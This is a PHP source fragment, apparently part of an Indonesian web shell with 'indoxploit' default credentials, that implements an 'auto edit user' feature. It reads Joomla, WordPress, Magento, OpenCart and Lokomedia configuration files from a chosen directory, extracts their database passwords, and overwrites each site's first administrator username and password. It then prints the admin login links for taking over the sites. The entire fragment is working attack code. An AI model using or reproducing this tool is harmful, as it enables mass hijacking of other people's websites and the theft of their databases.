sp ne

1.  elseif($_GET['do'] == 'auto_edit_user') {
2.     if($_POST['hajar']) {
3.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
4.             echo "username atau password harus lebih dari 6 karakter";
5.         } else {
6.             $user_baru = $_POST['user_baru'];
7.             $pass_baru = md5($_POST['pass_baru']);
8.             $conf = $_POST['config_dir'];
9.             $scan_conf = scandir($conf);
10.             foreach($scan_conf as $file_conf) {
11.                 if(!is_file("$conf/$file_conf")) continue;
12.                 $config = file_get_contents("$conf/$file_conf");
13.                 if(preg_match("/JConfig|joomla/",$config)) {
14.                     $dbhost = ambilkata($config,"host = '","'");
15.                     $dbuser = ambilkata($config,"user = '","'");
16.                     $dbpass = ambilkata($config,"password = '","'");
17.                     $dbname = ambilkata($config,"db = '","'");
18.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
19.                     $prefix = $dbprefix."users";
20.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
21.                     $db = mysql_select_db($dbname);
22.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
23.                     $result = mysql_fetch_array($q);
24.                     $id = $result['id'];
25.                     $site = ambilkata($config,"sitename = '","'");
26.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
27.                     echo "Config => ".$file_conf."<br>";
28.                     echo "CMS => Joomla<br>";
29.                     if($site == '') {
30.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
31.                     } else {
32.                         echo "Sitename => $site<br>";
33.                     }
34.                     if(!$update OR !$conn OR !$db) {
35.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
36.                     } else {
37.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
38.                     }
39.                     mysql_close($conn);
40.                 } elseif(preg_match("/WordPress/",$config)) {
41.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
42.                     $dbuser = ambilkata($config,"DB_USER', '","'");
43.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
44.                     $dbname = ambilkata($config,"DB_NAME', '","'");
45.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
46.                     $prefix = $dbprefix."users";
47.                     $option = $dbprefix."options";
48.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
49.                     $db = mysql_select_db($dbname);
50.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
51.                     $result = mysql_fetch_array($q);
52.                     $id = $result[ID];
53.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
54.                     $result2 = mysql_fetch_array($q2);
55.                     $target = $result2[option_value];
56.                     if($target == '') {
57.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
58.                     } else {
59.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
60.                     }
61.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
62.                     echo "Config => ".$file_conf."<br>";
63.                     echo "CMS => Wordpress<br>";
64.                     echo $url_target;
65.                     if(!$update OR !$conn OR !$db) {
66.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
67.                     } else {
68.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
69.                     }
70.                     mysql_close($conn);
71.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
72.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
73.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
74.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
75.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
76.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
77.                     $prefix = $dbprefix."admin_user";
78.                     $option = $dbprefix."core_config_data";
79.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
80.                     $db = mysql_select_db($dbname);
81.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
82.                     $result = mysql_fetch_array($q);
83.                     $id = $result[user_id];
84.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
85.                     $result2 = mysql_fetch_array($q2);
86.                     $target = $result2[value];
87.                     if($target == '') {
88.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
89.                     } else {
90.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
91.                     }
92.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
93.                     echo "Config => ".$file_conf."<br>";
94.                     echo "CMS => Magento<br>";
95.                     echo $url_target;
96.                     if(!$update OR !$conn OR !$db) {
97.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
98.                     } else {
99.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
100.                     }
101.                     mysql_close($conn);
102.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
103.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
104.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
105.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
106.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
107.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
108.                     $prefix = $dbprefix."user";
109.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
110.                     $db = mysql_select_db($dbname);
111.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
112.                     $result = mysql_fetch_array($q);
113.                     $id = $result[user_id];
114.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
115.                     if($target == '') {
116.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
117.                     } else {
118.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
119.                     }
120.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
121.                     echo "Config => ".$file_conf."<br>";
122.                     echo "CMS => OpenCart<br>";
123.                     echo $url_target;
124.                     if(!$update OR !$conn OR !$db) {
125.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
126.                     } else {
127.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
128.                     }
129.                     mysql_close($conn);
130.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
131.                     $dbhost = ambilkata($config,'server = "','"');
132.                     $dbuser = ambilkata($config,'username = "','"');
133.                     $dbpass = ambilkata($config,'password = "','"');
134.                     $dbname = ambilkata($config,'database = "','"');
135.                     $prefix = "users";
136.                     $option = "identitas";
137.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
138.                     $db = mysql_select_db($dbname);
139.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
140.                     $result = mysql_fetch_array($q);
141.                     $target = $result[alamat_website];
142.                     if($target == '') {
143.                         $target2 = $result[url];
144.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
145.                         if($target2 == '') {
146.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
147.                         } else {
148.                             $cek_login3 = file_get_contents("$target2/adminweb/");
149.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
150.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
151.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
152.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
153.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
154.                             } else {
155.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
156.                             }
157.                         }
158.                     } else {
159.                         $cek_login = file_get_contents("$target/adminweb/");
160.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
161.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
162.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
163.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
164.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
165.                         } else {
166.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
167.                         }
168.                     }
169.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
170.                     echo "Config => ".$file_conf."<br>";
171.                     echo "CMS => Lokomedia<br>";
172.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
173.                         echo $url_target2;
174.                     } else {
175.                         echo $url_target;
176.                     }
177.                     if(!$update OR !$conn OR !$db) {
178.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
179.                     } else {
180.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
181.                     }
182.                     mysql_close($conn);
183.                 }
184.             }
185.         }
186.     } else {
187.         echo "<center>
188.         <h1>Auto Edit User Config</h1>
189.         <form method='post'>
190.         DIR Config: <br>
191.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
192.         Set User & Pass: <br>
193.         <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
194.         <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
195.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
196.         </form>
197.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
198.         ";
199.     }